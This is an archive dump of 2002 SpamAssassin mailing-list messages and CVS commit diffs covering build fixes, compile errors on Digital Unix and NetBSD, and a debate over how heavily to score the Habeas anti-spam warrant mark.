  <si>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Update of /cvsroot/spamassassin/spamassassin/masses
In directory usw-pr-cvs1:/tmp/cvs-serv24879Modified Files:
      Tag: b2_4_0
	parse-rules-for-masses 
Log Message:
fix for bug 784Index: parse-rules-for-masses
===================================================================
RCS file: /cvsroot/spamassassin/spamassassin/masses/parse-rules-for-masses,v
retrieving revision 1.1.2.2
retrieving revision 1.1.2.3
diff -b -w -u -d -r1.1.2.2 -r1.1.2.3
--- parse-rules-for-masses	28 Aug 2002 13:49:51 -0000	1.1.2.2
+++ parse-rules-for-masses	28 Aug 2002 22:08:35 -0000	1.1.2.3
@@ -28,6 +28,7 @@
 if (!defined $outputfile) {
   $outputfile = "./tmp/rules.pl";
+  mkdir ("tmp", 0755);
 }
 my $rules =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</si>
  <si>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Robin Lynn Frank  writes:&gt; I may be dense, but why would anyone want to utilize Habeus?  To me,
&gt; it looks like a potential backdoor to anyone's defenses against spam.
&gt;
&gt; If I were a spammer, I'd simply set up a server, send out my spam with
&gt; the Habeus headers and continue till I was reasonably certain I'd been
&gt; reported.  Then I'd simply reconfigure the server and reconnect to a
&gt; different IP.  As long as no one can establish my connection to the
&gt; web sites my spam is directing people to, I'm home free.Here is the bug I opened:  http://www.hughes-family.org/bugzilla/show_bug.cgi?id=762RBLs have the same problem, but there is no negative RBL header rule
with a -20 score that can be forged, so the problem is unique to Habeas.&gt; Since I can set up spamassassin to I don't "lose" any email, what do I
&gt; gain by making it easier for spam to get through??My primary issue is the magnitude of the negative score and that it was
not determined empirically.  I am also concerned that it was added after
the rules freeze, that such a major change was not discussed in advance,
etc.There's also no evidence that the rule will actually reduce FPs.  People
who are smart enough to use the rule are probably capable of writing
email that doesn't look like spam (I'm not counting spam mailing lists
which you need to be exempted from spam filtering).Dan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</si>
  <si>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&gt; MSG_ID_ADDED_BY_MTA   (4.0 points)
&gt; INVALID_MSGID         (1.8 points) 
&gt; MSG_ID_ADDED_BY_MTA_2 (1.6 points)Here are the new scores in the 2.40 branch (they may change, but they
are better than before).score INVALID_MSGID                  1.226
score MSG_ID_ADDED_BY_MTA            1.696
score MSG_ID_ADDED_BY_MTA_2          0.532Total of 3.5 which is better than 7.4, I suppose.If they fixed their MSGID, it would help.  I suppose we could allow
comments without hurting spam detection too much, but I'm reluctant
(it's pretty bizarre to put a comment after the Message-ID header).Can you open a bugzilla ticket for this one?Dan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</si>
  <si>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Hi, I'm trying to build SA under Digital Unix 4.0f and am receiving a
compile error (and many warnings) for spamc.  The "perl Makefile.PL"
does OK, but when I do the make, I get this:cc -std -fprm d -ieee -D_INTRINSICS -I/usr/local/include -DLANGUAGE_C
-O4 spamd
/spamc.c  -o spamd/spamc -L/usr/local/lib -lbind -ldbm -ldb -lm -liconv
-lutil
cc: Error: spamd/spamc.c, line 50: In this declaration, "in_addr_t" has
no linkage and has a prior declaration in this scope at line number 592 in file
/usr/include/sys/types.h. (nolinkage)
typedef unsigned long   in_addr_t;      /* base type for internet
address */
------------------------^
cc: Warning: spamd/spamc.c, line 169: In this statement, the referenced
type of
the pointer value "msg_buf" is "char", which is not compatible with
"unsigned char". (ptrmismatch)
  if((bytes = full_read (in, msg_buf, max_size+1024, max_size+1024)) &gt;
max_size)
-----------------------------^
cc: Warning: spamd/spamc.c, line 174: In this statement, the referenced
type of
the pointer value "header_buf" is "char", which is not compatible with
"const unsigned char". (ptrmismatch)
    full_write (out,header_buf,bytes2);
--------------------^
cc: Warning: spamd/spamc.c, line 202: In this statement, the referenced
type of
the pointer value "header_buf" is "char", which is not compatible with
"const unsigned char". (ptrmismatch)
    full_write (out,header_buf,bytes2);
--------------------^
cc: Warning: spamd/spamc.c, line 203: In this statement, the referenced
type of the pointer value "msg_buf" is "char", which is not compatible
with "const unsigned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unsigned char". (ptrmismatch)
      full_write (out, out_buf, out_index);
-----------------------^
cc: Warning: spamd/spamc.c, line 497: In this statement, the referenced
type of
the pointer value "msg_buf" is "char", which is not compatible with
"const unsigned char". (ptrmismatch)
      full_write (STDOUT_FILENO,msg_buf,amount_read);
--------------------------------^
cc: Warning: spamd/spamc.c, line 512: In this statement, the referenced
type of
the pointer value "msg_buf" is "char", which is not compatible with
"const unsigned char". (ptrmismatch)
      full_write(STDOUT_FILENO,msg_buf,amount_read);
-------------------------------^
*** Exit 1
Stop.Can anyone suggest a way to get around this?   TIA...Jim
*-------------------------------------------------------------------------*
* James H. McCullars                 I Phone: (256) 824-2610              *
* Director of Systems &amp; Operations   I Fax:   (256) 824-6643              *
* Computer &amp; Network Services        I Internet: mccullj@email.uah.edu    *
* The University of Alabama          I -----------------------------------*
*    in Huntsville                   I                                    *
* Huntsville, AL 35899               I This space for rent - CHEAP!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</si>
  <si>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Is there a way to tell spamassassin to put the results at the bottom
of the message instead?  If not, what is the easiest way to do this.
I found a report_header, but no equivalent report_bottom.Thanks,Jon.
jon.g@directfreight.com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</si>
  <si>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Update of /cvsroot/spamassassin/spamassassin/t
In directory usw-pr-cvs1:/tmp/cvs-serv3992/tModified Files:
      Tag: b2_4_0
	SATest.pm 
Log Message:
ok, looks like SA can now be run even with another version installed in /usr, againIndex: SATest.pm
===================================================================
RCS file: /cvsroot/spamassassin/spamassassin/t/SATest.pm,v
retrieving revision 1.15.4.1
retrieving revision 1.15.4.2
diff -b -w -u -d -r1.15.4.1 -r1.15.4.2
--- SATest.pm	27 Aug 2002 21:44:14 -0000	1.15.4.1
+++ SATest.pm	28 Aug 2002 22:46:28 -0000	1.15.4.2
@@ -15,7 +15,7 @@
   my $tname = shift;
   $scr = $ENV{'SCRIPT'};
-  $scr ||= "../spamassassin";
+  $scr ||= "perl -w ../spamassassin";
   $spamd = $ENV{'SPAMD_SCRIPT'};
   $spamd ||= "../spamd/spamd -x";-------------------------------------------------------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</si>
  <si>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On Wednesday 28 August 2002 01:50 pm, Robin Lynn Frank wrote:&gt; On Wednesday 28 August 2002 01:34 pm, Brian McNett wrote:
&gt; &gt; Also, that little haiku is a copyrighted work, so not only CAN
&gt; &gt; Habeas sue, they MUST sue to protect their copyright. And since
&gt; &gt; it's a trademark as well, that's a double-whammy. Habeas has
&gt; &gt; some pretty high-powered legal people, who will gladly go to
&gt; &gt; town on violators.&gt; &gt; The whole point here is to give them the legal leverage they
&gt; &gt; need to put spammers out of business, and not only block mail
&gt; &gt; from them, but allow through the things that really AREN'T spam.&gt; And if a spammer forges headers???There must be *some* way of tracking a spammer down, since they are planning 
on making money from the spam.  What a court would consider evidence of being 
the spammer is another question.-- 
Give a man a match, and he'll be warm for a minute, but set him on
fire, and he'll be warm for the rest of his life.ICQ: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</si>
  <si>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28 Aug 2002, Matthew Cline wrote:&gt; There must be *some* way of tracking a spammer down, since they are
&gt; planning on making money from the spam.Many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haven't stopped the spammer, so the benefit is strictly to Habeas,
not to the recipients of the spam.  That's the main problem I have with
the whole scenario: My pain, Habeas's gain, and those most likely to be
held liable are those least likely to be the really serious abusers.-------------------------------------------------------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</si>
  <si>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Update of /cvsroot/spamassassin/spamassassin
In directory usw-pr-cvs1:/tmp/cvs-serv15398Modified Files:
      Tag: b2_4_0
	configure configure.in 
Log Message:
NetBSD support patch from Klaus Heinz, bug 785Index: configure
===================================================================
RCS file: /cvsroot/spamassassin/spamassassin/configure,v
retrieving revision 1.1.2.1
retrieving revision 1.1.2.2
diff -b -w -u -d -r1.1.2.1 -r1.1.2.2
--- configure	27 Aug 2002 23:07:13 -0000	1.1.2.1
+++ configure	28 Aug 2002 23:29:04 -0000	1.1.2.2
@@ -1273,18 +1273,22 @@
                  cat &gt; conftest.$ac_ext &lt;
 #include 
+int main() {
+printf ("%d", SHUT_RD); return 0;
+; return 0; }
 EOF
-if (eval "$ac_cpp conftest.$ac_ext") 2&gt;&amp;5 |
-  egrep "SHUT_RD" &gt;/dev/null 2&gt;&amp;1; then
+if { (eval echo configure:1283: \"$ac_compile\") 1&gt;&amp;5; (eval $ac_compile) 2&gt;&amp;5; }; then
   rm -rf conftest*
   shutrd=yes
 else
+  echo "configure: failed program was:" &gt;&amp;5
+  cat conftest.$ac_ext &gt;&amp;5
   rm -rf conftest*
   shutrd=no
 fi
-rm -f conftest*
-
+rm -f conftest*,
 fi
@@ -1298,7 +1302,7 @@
 echo $ac_n "checking for socket in -lsocket""... $ac_c" 1&gt;&amp;6
-echo "configure:1302: checking for socket in -lsocket" &gt;&amp;5
+echo "configure:1306: checking for socket in -lsocket" &gt;&amp;5
 ac_lib_var=`echo socket'_'socket | sed 'y%./+-%__p_%'`
 if eval "test \"`echo '$''{'ac_cv_lib_$ac_lib_var'+set}'`\" = set"; then
   echo $ac_n "(cached) $ac_c" 1&gt;&amp;6
@@ -1306,7 +1310,7 @@
   ac_save_LIBS="$LIBS"
 LIBS="-lsocket  $LIBS"
 cat &gt; conftest.$ac_ext &lt;&amp;5; (eval $ac_link) 2&gt;&amp;5; } &amp;&amp; test -s conftest${ac_exeext}; then
+if { (eval echo configure:1325: \"$ac_link\") 1&gt;&amp;5; (eval $ac_link) 2&gt;&amp;5; } &amp;&amp; test -s conftest${ac_exeext}; then
   rm -rf conftest*
   eval "ac_cv_lib_$ac_lib_var=yes"
 else
@@ -1345,7 +1349,7 @@
 fi
 echo $ac_n "checking for connect in -linet""... $ac_c" 1&gt;&amp;6
-echo "configure:1349: checking for connect in -linet" &gt;&amp;5
+echo "configure:1353: checking for connect in -linet" &gt;&amp;5
 ac_lib_var=`echo inet'_'connect | sed 'y%./+-%__p_%'`
 if eval "test \"`echo '$''{'ac_cv_lib_$ac_lib_var'+set}'`\" = set"; then
   echo $ac_n "(cached) $ac_c" 1&gt;&amp;6
@@ -1353,7 +1357,7 @@
   ac_save_LIBS="$LIBS"
 LIBS="-linet  $LIBS"
 cat &gt; conftest.$ac_ext &lt;&amp;5; (eval $ac_link) 2&gt;&amp;5; } &amp;&amp; test -s conftest${ac_exeext}; then
+if { (eval echo configure:1372: \"$ac_link\") 1&gt;&amp;5; (eval $ac_link) 2&gt;&amp;5; } &amp;&amp; test -s conftest${ac_exeext}; then
   rm -rf conftest*
   eval "ac_cv_lib_$ac_lib_var=yes"
 else
@@ -1392,7 +1396,7 @@
 fi
 echo $ac_n "checking for t_accept in -lnsl""... $ac_c" 1&gt;&amp;6
-echo "configure:1396: checking for t_accept in -lnsl" &gt;&amp;5
+echo "configure:1400: checking for t_accept in -lnsl" &gt;&amp;5
 ac_lib_var=`echo nsl'_'t_accept | sed 'y%./+-%__p_%'`
 if eval "test \"`echo '$''{'ac_cv_lib_$ac_lib_var'+set}'`\" = set"; then
   echo $ac_n "(cached) $ac_c" 1&gt;&amp;6
@@ -1400,7 +1404,7 @@
   ac_save_LIBS="$LIBS"
 LIBS="-lnsl  $LIBS"
 cat &gt; conftest.$ac_ext &lt;&amp;5; (eval $ac_link) 2&gt;&amp;5; } &amp;&amp; test -s conftest${ac_exeext}; then
+if { (eval echo configure:1419: \"$ac_link\") 1&gt;&amp;5; (eval $ac_link) 2&gt;&amp;5; } &amp;&amp; test -s conftest${ac_exeext}; then
   rm -rf conftest*
   eval "ac_cv_lib_$ac_lib_var=yes"
 else
@@ -1439,7 +1443,7 @@
 fi
 echo $ac_n "checking for dlopen in -ldl""... $ac_c" 1&gt;&amp;6
-echo "configure:1443: checking for dlopen in -ldl" &gt;&amp;5
+echo "configure:1447: checking for dlopen in -ldl" &gt;&amp;5
 ac_lib_var=`echo dl'_'dlopen | sed 'y%./+-%__p_%'`
 if eval "test \"`echo '$''{'ac_cv_lib_$ac_lib_var'+set}'`\" = set"; then
   echo $ac_n "(cached) $ac_c" 1&gt;&amp;6
@@ -1447,7 +1451,7 @@
   ac_save_LIBS="$LIBS"
 LIBS="-ldl  $LIBS"
 cat &gt; conftest.$ac_ext &lt;&amp;5; (eval $ac_link) 2&gt;&amp;5; } &amp;&amp; test -s conftest${ac_exeext}; then
+if { (eval echo configure:1466: \"$ac_link\") 1&gt;&amp;5; (eval $ac_link) 2&gt;&amp;5; } &amp;&amp; test -s conftest${ac_exeext}; then
   rm -rf conftest*
   eval "ac_cv_lib_$ac_lib_var=yes"
 else
@@ -1489,12 +1493,12 @@
 for ac_func in socket strdup strtod strtol snprintf shutdown
 do
 echo $ac_n "checking for $ac_func""... $ac_c" 1&gt;&amp;6
-echo "configure:1493: checking for $ac_func" &gt;&amp;5
+echo "configure:1497: checking for $ac_func" &gt;&amp;5
 if eval "test \"`echo '$''{'ac_cv_func_$ac_func'+set}'`\" = set"; then
   echo $ac_n "(cached) $ac_c" 1&gt;&amp;6
 else
   cat &gt; conftest.$ac_ext &lt;&amp;5; (eval $ac_link) 2&gt;&amp;5; } &amp;&amp; test -s conftest${ac_exeext}; then
+if { (eval echo configure:1525: \"$ac_link\") 1&gt;&amp;5; (eval $ac_link) 2&gt;&amp;5; } &amp;&amp; test -s conftest${ac_exeext}; then
   rm -rf conftest*
   eval "ac_cv_func_$ac_func=yes"
 else
@@ -1544,20 +1548,20 @@
 echo $ac_n "checking for h_errno""... $ac_c" 1&gt;&amp;6
-echo "configure:1548: checking for h_errno" &gt;&amp;5
+echo "configure:1552: checking for h_errno" &gt;&amp;5
 if eval "test \"`echo '$''{'herrno'+set}'`\" = set"; then
   echo $ac_n "(cached) $ac_c" 1&gt;&amp;6
 else
                 cat &gt; conftest.$ac_ext &lt;
 int main() {
 printf ("%d", h_errno); return 0;
 ; return 0; }
 EOF
-if { (eval echo configure:1561: \"$ac_compile\") 1&gt;&amp;5; (eval $ac_compile) 2&gt;&amp;5; }; then
+if { (eval echo configure:1565: \"$ac_compile\") 1&gt;&amp;5; (eval $ac_compile) 2&gt;&amp;5; }; then
   rm -rf conftest*
   herrno=yes
 else
@@ -1580,20 +1584,20 @@
 echo $ac_n "checking for optarg""... $ac_c" 1&gt;&amp;6
-echo "configure:1584: checking for optarg" &gt;&amp;5
+echo "configure:1588: checking for optarg" &gt;&amp;5
 if eval "test \"`echo '$''{'haveoptarg'+set}'`\" = set"; then
   echo $ac_n "(cached) $ac_c" 1&gt;&amp;6
 else
                 cat &gt; conftest.$ac_ext &lt;
 int main() {
 if (optarg == (char *) 0L) { return 0; } return 1;
 ; return 0; }
 EOF
-if { (eval echo configure:1597: \"$ac_compile\") 1&gt;&amp;5; (eval $ac_compile) 2&gt;&amp;5; }; then
+if { (eval echo configure:1601: \"$ac_compile\") 1&gt;&amp;5; (eval $ac_compile) 2&gt;&amp;5; }; then
   rm -rf conftest*
   haveoptarg=yes
 else
@@ -1616,20 +1620,21 @@
 echo $ac_n "checking for in_addr_t""... $ac_c" 1&gt;&amp;6
-echo "configure:1620: checking for in_addr_t" &gt;&amp;5
+echo "configure:1624: checking for in_addr_t" &gt;&amp;5
 if eval "test \"`echo '$''{'inaddrt'+set}'`\" = set"; then
   echo $ac_n "(cached) $ac_c" 1&gt;&amp;6
 else
                 cat &gt; conftest.$ac_ext &lt;
 #include 
 int main() {
 in_addr_t foo; return 0;
 ; return 0; }
 EOF
-if { (eval echo configure:1633: \"$ac_compile\") 1&gt;&amp;5; (eval $ac_compile) 2&gt;&amp;5; }; then
+if { (eval echo configure:1638: \"$ac_compile\") 1&gt;&amp;5; (eval $ac_compile) 2&gt;&amp;5; }; then
   rm -rf conftest*
   inaddrt=yes
 else
@@ -1645,12 +1650,12 @@
 echo "$ac_t""$inaddrt" 1&gt;&amp;6
 if test $inaddrt = no ; then
   echo $ac_n "checking for in_addr_t""... $ac_c" 1&gt;&amp;6
-echo "configure:1649: checking for in_addr_t" &gt;&amp;5
+echo "configure:1654: checking for in_addr_t" &gt;&amp;5
 if eval "test \"`echo '$''{'ac_cv_type_in_addr_t'+set}'`\" = set"; then
   echo $ac_n "(cached) $ac_c" 1&gt;&amp;6
 else
   cat &gt; conftest.$ac_ext &lt;
 #if STDC_HEADERS
@@ -1681,20 +1686,21 @@
 echo $ac_n "checking for INADDR_NONE""... $ac_c" 1&gt;&amp;6
-echo "configure:1685: checking for INADDR_NONE" &gt;&amp;5
+echo "configure:1690: checking for INADDR_NONE" &gt;&amp;5
 if eval "test \"`echo '$''{'haveinaddrnone'+set}'`\" = set"; then
   echo $ac_n "(cached) $ac_c" 1&gt;&amp;6
 else
                 cat &gt; conftest.$ac_ext &lt;
 #include 
 int main() {
 in_addr_t foo = INADDR_NONE; return 0;
 ; return 0; }
 EOF
-if { (eval echo configure:1698: \"$ac_compile\") 1&gt;&amp;5; (eval $ac_compile) 2&gt;&amp;5; }; then
+if { (eval echo configure:1704: \"$ac_compile\") 1&gt;&amp;5; (eval $ac_compile) 2&gt;&amp;5; }; then
   rm -rf conftest*
   haveinaddrnone=yes
 else
@@ -1717,20 +1723,23 @@
 echo $ac_n "checking for EX__MAX""... $ac_c" 1&gt;&amp;6
-echo "configure:1721: checking for EX__MAX" &gt;&amp;5
+echo "configure:1727: checking for EX__MAX" &gt;&amp;5
 if eval "test \"`echo '$''{'haveexmax'+set}'`\" = set"; then
   echo $ac_n "(cached) $ac_c" 1&gt;&amp;6
 else
                 cat &gt; conftest.$ac_ext &lt;
+#endif
 #include 
 int main() {
 int foo = EX__MAX; return 0;
 ; return 0; }
 EOF
-if { (eval echo configure:1734: \"$ac_compile\") 1&gt;&amp;5; (eval $ac_compile) 2&gt;&amp;5; }; then
+if { (eval echo configure:1743: \"$ac_compile\") 1&gt;&amp;5; (eval $ac_compile) 2&gt;&amp;5; }; then
   rm -rf conftest*
   haveexmax=yes
 elseIndex: configure.in
===================================================================
RCS file: /cvsroot/spamassassin/spamassassin/configure.in,v
retrieving revision 1.1.2.1
retrieving revision 1.1.2.2
diff -b -w -u -d -r1.1.2.1 -r1.1.2.2
--- configure.in	27 Aug 2002 23:07:13 -0000	1.1.2.1
+++ configure.in	28 Aug 2002 23:29:04 -0000	1.1.2.2
@@ -26,9 +26,11 @@
 AC_CACHE_CHECK([for SHUT_RD],
        shutrd, [
-                 AC_EGREP_HEADER(SHUT_RD, sys/socket.h,
+                AC_TRY_COMPILE([#include 
+#include ],
+                        [printf ("%d", SHUT_RD); return 0;],
                                         [shutrd=yes],
-                                        [shutrd=no])
+                                        [shutrd=no]),
        ])
 if test $shutrd = yes ; then
   AC_DEFINE(HAVE_SHUT_RD)
@@ -73,7 +75,8 @@
 AC_CACHE_CHECK([for in_addr_t],
         inaddrt, [
-                AC_TRY_COMPILE([#include ],
+                AC_TRY_COMPILE([#include 
+#include ],
                         [in_addr_t foo; return 0;],
                                         [inaddrt=yes],
                                         [inaddrt=no]),
@@ -86,7 +89,8 @@
 AC_CACHE_CHECK([for INADDR_NONE],
         haveinaddrnone, [
-                AC_TRY_COMPILE([#include ],
+                AC_TRY_COMPILE([#include 
+#include ],
                         [in_addr_t foo = INADDR_NONE; return 0;],
                                         [haveinaddrnone=yes],
                                         [haveinaddrnone=no]),
@@ -99,7 +103,10 @@
 AC_CACHE_CHECK([for EX__MAX],
         haveexmax, [
-                AC_TRY_COMPILE([#include ],
+                AC_TRY_COMPILE([#ifdef HAVE_SYSEXITS_H
+#include 
+#endif
+#include ],
                         [int foo = EX__MAX; return 0;],
                                         [haveexmax=yes],
                                         [haveexmax=no]),-------------------------------------------------------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</si>
  <si>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 xml:space="preserve">
&gt; t/db_based_whitelist.Use of bare &lt;&lt; to mean &lt;&lt;"" is deprecated at
&gt; ../lib/Mail/SpamAssassin/HTML.pm line 1. Use of bare &lt;&lt; to mean &lt;&lt;"" is
&gt; deprecated at ../lib/Mail/SpamAssassin/HTML.pm line 6. Unquoted stringhmm, could you check your installation?  those chars aren't in my
version at all.--j.-------------------------------------------------------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</si>
  <si>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Matthew Cline  writes:&gt; There must be *some* way of tracking a spammer down, since they are
&gt; planning on making money from the spam.  What a court would consider
&gt; evidence of being the spammer is another question.Haha!!!Just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</si>
  <si>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
On Wednesday, August 28, 2002, at 01:50  PM, Robin Lynn Frank wrote:&gt; And if a spammer forges headers???Header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25 blocking on the part of many 
ISPs make open relays unattractive to spammers.One would think, that the combination of a forged Habeas-SWE, 
and mail sent through an anonymizing open proxy would be a 
fairly good indication of spam.  Tracking a spammer to his 
meatspace location is not as difficult as you might think, once 
you have legal recourse to subpoena records.--B-------------------------------------------------------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</si>
  <si>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
On Wednesday, August 28, 2002, at 04:38  PM, Daniel Quinlan wrote:&gt; Just a few notes:
&gt;
&gt;  - It will be difficult to find, prosecute, and win money from someone
&gt;    in various non-friendly countries where spam originates (China is a
&gt;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it's coming from open 
http, or squid proxy servers.  It's hosted there because these 
spammers are now persona-non-grata on all US ISPs.  One hardly 
needs to involve the Chinese government in a case where a US 
citizen is violating US law.
&gt;  - Law suits take time. Between now and conclusion of the first court
&gt;    case, we could have years of spam in our mail boxes!The first court cases were actually concluded years ago. These 
include many legal precedents which are used to protect the 
rights of ISPs to block mail, and to terminate service to 
spammers.&gt;  - Contact information can change: phone numbers, PO boxes, stolen
&gt;    cell phones, temporary email addresses, etc.Surprising then, how much information you can find on the 
current whereabouts of long-time spammers like Alan Ralksy of 
Detroit, Michigan.  Ralsky is a guy who even gives interviews to 
the news media.  If you can connect a specific corpus of spam to 
him, his street address is well known. Ralsky is a prime 
candidate for lawsuits in any state with an anti-spam law. 
Thomas Cowles is another long-time spammer, but last I heard 
he'd been jailed for stealing computer equipment from his 
business partner, Eddy Marin (also a long time spammer (You've 
heard of PopLaunch, right?)&gt;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way.Back when I was working at MAPS, there was a flap over a 
pump-and-dump spammer, Rodona Garst.  Seems she had an open 
file-share on her laptop, and when she forged the wrong domain, 
the real owner hacked in and posted all her private information 
on a website. Oh, look, it's still there, including the nude 
photos:http://belps.freewebsites.com/I recall this well, because the SEC was VERY interested in 
confirming the validity of the information found online.  There 
were some "interesting" conversations. This summer, the SEC 
released the following:http://www.sec.gov/litigation/admin/33-8113.htmYes, the investigation took two years, but the financial penalty 
for operating a pump-and-dump scam isn't small.  The wheels of 
government grind slow, but the grind very fine indeed.--B-------------------------------------------------------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</si>
  <si>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Now that I have spam assassin and mailscanner working, how can I have smap
deleted rather than forwarded?I changed spam.actions.conf to "default	delete" but it is still sending it
to the recipient.Thanks,
Ken-------------------------------------------------------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</si>
  <si>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28 August 2002 04:38 pm, Daniel Quinlan wrote:
&gt; Matthew Cline  writes:
&gt; &gt; There must be *some* way of tracking a spammer down, since they are
&gt; &gt; planning on making money from the spam.  What a court would consider
&gt; &gt; evidence of being the spammer is another question.&gt; Haha!!!&gt; Just a few notes:&gt;  - It will be difficult to find, prosecute, and win money from someone
&gt;    in various non-friendly countries where spam originates (China is a
&gt;    good example) even if they do officially "respect" copyright law.SA (and other filters) could be configured to ignore the SWE mark if it 
appears to come from/through China.&gt;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way.SA could also be configured so that SWE marks are ignored in messages that 
look like third-party spam (like stock scams).  Of course, this would still 
mean that "The U.N. is going to invade America!" spams with SWE would get 
through.  Probably also need to ignore SWE in messages that look like 
Nigerian scams.-- 
Give a man a match, and he'll be warm for a minute, but set him on
fire, and he'll be warm for the rest of his life.ICQ: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</si>
  <si>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Guys, the Habeas Infringers List (HIL) exists explicitly to deal with
spammers while we're getting judgments against them and especially in
other countries, where those judgments are harder to get.Please note that nobody has ever had an incentive before to go after
regular spammers.  Yes, some attorneys general have prosecuted blatant
pyramid schemes, and ISPs have won some theft of service suits, but the
vast majority of spammers go forward with out any legal hassles.  So, I
can't understand how Daniel can assert that you can't track spammers
down when it's never really been tried.  We can subpoena the records of
the business they spammed on behalf of.  We can subpoena the records of
the ISP that provided them service, and of the credit card they used for
the whack-a-mole accounts.  We can use private investigators.  Yes,
these people are often lowlifes (chickenboners).  But, they're not
secret agents.  They're just trying to make a buck, and Habeas' whole
business is about finding them and putting them out of businessHabeas has the incentive to pursue spammers (that use our warrant mark)
in a way that no one ever has had before.  Given that our whole business
plan relies on Habeas becoming synonymous with "not spam", I can't
understand why you would assume ahead of time that we will be
unsuccessful, plan for that failure, and in so doing, remove the
potential of success, which is anti-spam filters like SA acting on the
Habeas warrant mark.Daniel, it's easy enough for you to change the Habeas scores yourself on
your installation.  If Habeas fails to live up to its promise to only
license the warrant mark to non-spammers and to place all violators on
the HIL, then I have no doubt that Justin and Craig will quickly remove
us from the next release.  But, you're trying to kill Habeas before it
has a chance to show any promise.At the end of the day, SpamAssassin is like the Club, in that it
encourages thieves (spammers) to just go after the next car (those
without SA) rather than yours.  Habeas can play the role of LoJack (the
transmitter), in enabling the apprehension of thieves so that they don't
steal any more cars.  But only if we're given a chance to succeed.          - dan
--
Dan Kohn 
  -----Original Message-----
From: Daniel Quinlan [mailto:quinlan@pathname.com] 
Sent: Wednesday, August 28, 2002 16:38
To: Matthew Cline
Cc: spamassassin-talk@example.sourceforge.net
Subject: Re: [SAtalk] O.T. Habeus -- Why?
Matthew Cline  writes:&gt; There must be *some* way of tracking a spammer down, since they are
&gt; planning on making money from the spam.  What a court would consider
&gt; evidence of being the spammer is another question.Haha!!!Just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</si>
  <si>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28 Aug 2002 17:45:49 -0700
Brian McNett  wrote:&gt; The first court cases were actually concluded years ago. These 
&gt; include many legal precedents which are used to protect the 
&gt; rights of ISPs to block mail, and to terminate service to 
&gt; spammers.Yeah, but these would be different cases relating to copyright infringements,
not about ISP's blocking mail or not.
---
Lars Hansson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</si>
  <si>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Don Newcomer wrote:
&gt; I'm a new user (or about to be, hopefully) of SA but I've run into some
&gt; compilation errors that prevent me from installing.  Rather than picking
&gt; through the code, I thought I'd avoid reinventing the wheel and ask here.
&gt; When I run the 'make', I get the following:
&gt; 
&gt; cc: Error: spamd/spamc.c, line 50: In this declaration, "in_addr_t" has no
&gt; linka
&gt; ge and has a prior declaration in this scope at line number 572 in file
&gt; /usr/inc
&gt; lude/sys/types.h. (nolinkage)
&gt; typedef unsigned long   in_addr_t;      /* base type for internet address
&gt; */Don't worry about the warnings. To fix the error, edit spamc.c and right 
after the line that says:#define EX__MAX 77Add:#if !defined __osf__
extern char *optarg;
typedef unsigned long   in_addr_t;      /* base type for internet address */
#endif(you're adding the two lines that start with #).--Rick-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Spamassassin-talk mailing list
Spamassassin-talk@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/spamassassin-talk</t>
  </si>
  <si>
    <t>&gt; It's this section of spamassassin.raw:
&gt;
&gt; &lt;&lt;&lt;&lt;&lt;&lt;&lt; spamassassin.raw
[...snip]       }
&gt; =3D=3D=3D=3D=3D=3D=3D
[... snip ...]
&gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt; 1.68.2.10
[...snip...]This is what cvs puts in when you modify the copy of the file on your disk
and someone checks in a change and then you pull an update and cvs can't
figure out how to merge your changes and the checked in changes. The lines
between the &lt;&lt;&lt;&lt;&lt;&lt; and the ===== are in your file and the ones in the next
section are what have been checked in. You must have not noticed the warning
messages about conflicts that cvs gave you when you did the update, and the
"C" flag next to that file when cvs listed the files being pulled. -- sidney
-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Spamassassin-devel mailing list
Spamassassin-devel@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/spamassassin-devel</t>
  </si>
  <si>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t>
  </si>
  <si>
    <t>Dan Kohn  writes:&gt; Guys, the Habeas Infringers List (HIL) exists explicitly to deal with
&gt; spammers while we're getting judgments against them and especially in
&gt; other countries, where those judgments are harder to get.My concern doesn't stem from failing to understand how your business is
intended to work.  My concern is the lack of empirical evidence that it
will reduce the amount of uncaught spam.&gt; Please note that nobody has ever had an incentive before to go after
&gt; regular spammers.  Yes, some attorneys general have prosecuted blatant
&gt; pyramid schemes, and ISPs have won some theft of service suits, but
&gt; the vast majority of spammers go forward with out any legal hassles.
&gt; So, I can't understand how Daniel can assert that you can't track
&gt; spammers down when it's never really been tried.Please don't misquote me.  I did not assert that you "can't track
spammers".  Here is what I said:| It will be difficult to find, prosecute, and win money from someone in
| various non-friendly countries where spam originates (China is a good
| example) even if they do officially "respect" copyright law.I understand the incentive that you have to pursue spammers, but that
does not directly translate to less spam being sent to my inbox.  It is
an indirect effect and the magnitude of the effect may not be sufficient
to counteract the ease with which a -20 score on the mark allows spam to
avoid being tagged as spam.&gt; Daniel, it's easy enough for you to change the Habeas scores yourself
&gt; on your installation.  If Habeas fails to live up to its promise to
&gt; only license the warrant mark to non-spammers and to place all
&gt; violators on the HIL, then I have no doubt that Justin and Craig will
&gt; quickly remove us from the next release.  But, you're trying to kill
&gt; Habeas before it has a chance to show any promise.I think I've worked on SA enough to understand that I can localize a
score.  I'm just not comfortable with using SpamAssassin as a vehicle
for drumming up your business at the expense of our user base.I think it would make more sense to start Habeas with a less aggressive
score (one which will not give spammers a quick path into everyone's
inbox) and after we've seen evidence that the system works, then we can
increase the magnitude of the score.Dan
-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Spamassassin-talk mailing list
Spamassassin-talk@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/spamassassin-talk</t>
  </si>
  <si>
    <t>&gt; I think I've worked on SA enough to understand that I can localize a
&gt; score.  I'm just not comfortable with using SpamAssassin as a vehicle
&gt; for drumming up your business at the expense of our user base.This is exactly what I think. SpamAssassin has always been conservative
about adding unproven RBLs and such, and this should be the same.&gt; I think it would make more sense to start Habeas with a less aggressive
&gt; score (one which will not give spammers a quick path into everyone's
&gt; inbox) and after we've seen evidence that the system works, then we can
&gt; increase the magnitude of the score.I say start it with a zero score and put it in 70_cvs_rules_under_test like
any other unproven rule. Then score it based on actual results, not
promises. My corpus does not yet contain a single non-spam (or spam) message
with a Habeas mark. Based on that, it doesn't impress me and it wouldn't
impress the GA either. Rules with exactly the same statistics are being
dropped from SA right now, and I don't see why this should be any different.--
